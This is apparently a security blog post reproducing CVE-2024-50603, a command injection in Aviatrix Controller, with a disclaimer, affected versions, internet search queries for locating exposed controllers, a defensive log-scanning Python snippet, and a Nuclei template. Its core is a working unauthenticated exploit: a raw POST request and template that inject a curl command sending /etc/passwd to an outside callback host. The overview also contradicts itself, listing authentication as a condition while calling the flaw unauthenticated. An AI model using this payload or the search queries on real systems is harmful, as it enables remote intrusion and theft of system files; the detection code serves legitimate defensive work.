[Vulnerability Reproduction] CVE-2024-50603

混子Hacker 2025-01-12 12:54

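Disclaimer
Do not use the techniques described in this article for unauthorized testing. The user alone is responsible for any direct or indirect consequences and losses caused by spreading or using the information or tools provided in this article; the author bears no legal or joint liability.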


Vulnerability Overview


CVE-2024-50603

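In affected versions of Aviatrix Controller, the cloud_type parameter of the list_flightpath_destination_instances action and the src_cloud_type parameter of the flightpath_connection_test action under /v1/api lack proper input sanitization, which can lead to command injection. An unauthenticated remote attacker can craft a malicious request and exploit this vulnerability to execute arbitrary commands.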

Affected versions

Aviatrix Controller < 7.1.4191

Aviatrix Controller 7.2.x < 7.2.4996

Vulnerability score

10.0

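Exploitation conditions

User authentication


Exploitation difficulty


Required privileges

Solution

Upgrade the version

Vulnerability information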


01

Asset mapping

fofa: app="aVIaTrIX-Controller"
Quake:app:"Aviatrix Controller"



02

Vulnerability reproduction

POST /v1/api HTTP/1.1
Host: xxx
User-Agent: Mozilla/5.0 (CentOS; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Connection: close
Content-Length: 193
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

action=list_flightpath_destination_instances&CID=anything_goes_here&account_name=1&region=1&vpc_id_name=1&cloud_type=1|$(curl+-X+POST+-d+@/etc/passwd+http://dnglog)
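
For defenders, an added example (not from the original article and not Aviatrix code): a Python check for recorded requests to /v1/api that flags a cloud_type or src_cloud_type value outside an allow-list for the two affected actions. The allow-list pattern (a short decimal identifier), the function names and the sample records are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qs

# Action -> parameter named in the vulnerability description above.
WATCHED = {
    "list_flightpath_destination_instances": "cloud_type",
    "flightpath_connection_test": "src_cloud_type",
}
# Assumption: a legitimate value is a short decimal cloud identifier.
SAFE_VALUE = re.compile(r"[0-9]{1,6}")


def inspect_form(form: str):
    """Return (action, parameter, decoded value) for every value off the allow-list."""
    fields = parse_qs(form, keep_blank_values=True)  # decodes %xx and '+'
    findings = []
    for action in fields.get("action", []):
        param = WATCHED.get(action)
        # Check every occurrence, so a repeated parameter cannot hide a bad value.
        for value in fields.get(param, []) if param else []:
            if not SAFE_VALUE.fullmatch(value):
                findings.append((action, param, value))
    return findings


def scan(records):
    """records: (request target, body) pairs. Returns [(record index, finding)]."""
    hits = []
    for i, (target, body) in enumerate(records):
        path, _, query = target.partition("?")
        if path.rstrip("/") != "/v1/api":
            continue
        # Inspect query string and body together in case either carries the fields.
        hits += [(i, f) for f in inspect_form("&".join(p for p in (query, body) if p))]
    return hits


# Constructed records, not real traffic. PAYLOAD is the value from the request
# above with a placeholder callback host.
PAYLOAD = "1|$(curl+-X+POST+-d+@/etc/passwd+http://callback.example)"
SAMPLE = [
    ("/v1/api", "action=list_flightpath_destination_instances&CID=a&cloud_type=1"),
    ("/v1/api", "action=other_action&cloud_type=" + PAYLOAD),
    ("/v1/api", "action=list_flightpath_destination_instances&CID=a&cloud_type=" + PAYLOAD),
    ("/v1/api", "action=flightpath_connection_test&src_cloud_type=8&src_cloud_type=" + PAYLOAD),
    ("/other", "action=flightpath_connection_test&src_cloud_type=" + PAYLOAD),
]

if __name__ == "__main__":
    for idx, (action, param, value) in scan(SAMPLE):
        print(f"record {idx}: {action} {param}={value!r}")
```

Because the check is an allow-list, it also reports empty or non-numeric values that are not injection attempts; treat hits as leads to review alongside the upgrade listed under Solution.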


03

Nuclei PoC

id: CVE-2024-50603
info:
  name: Aviatrix Controller RCE
  author: newlinesec,securing.pl
  severity: critical
  description: |
    An issue was discovered in Aviatrix Controller before 7.1.4191 and 7.2.x before 7.2.4996. Due to the improper neutralization of special elements used in an OS command, an unauthenticated attacker is able to execute arbitrary code. Shell metacharacters can be sent to /v1/api in cloud_type for list_flightpath_destination_instances, or src_cloud_type for flightpath_connection_test.
  reference:
    - https://www.securing.pl/en/cve-2024-50603-aviatrix-network-controller-command-injection-vulnerability/
    - https://nvd.nist.gov/vuln/detail/CVE-2024-50603
    - https://docs.aviatrix.com/documentation/latest/network-security/index.html
    - https://docs.aviatrix.com/documentation/latest/release-notices/psirt-advisories/psirt-advisories.html?expand=true#remote-code-execution-vulnerability-in-aviatrix-controllers
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 10.0
    cve-id: CVE-2024-50603
    cwe-id: CWE-78
  metadata:
    vendor: aviatrix
    product: controller
    zoomeye-query: app="Aviatrix Controller"
  tags: cve,cve2024,aviatrix,controller,rce,oast

variables:
  oast: "{{interactsh-url}}"

http:
  - raw:
      - |
        POST /v1/api HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        action=list_flightpath_destination_instances&CID=anything_goes_here&account_name=1&region=1&vpc_id_name=1&cloud_type=1|$(curl+-X+POST+-d+@/etc/passwd+{{oast}})

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol
        name: http
        words:
          - "http"

      - type: status
        status:
          - 200

      - type: regex
        part: interactsh_request
        regex:
          - 'root:.*:0:0:'


Author | 混子Hacker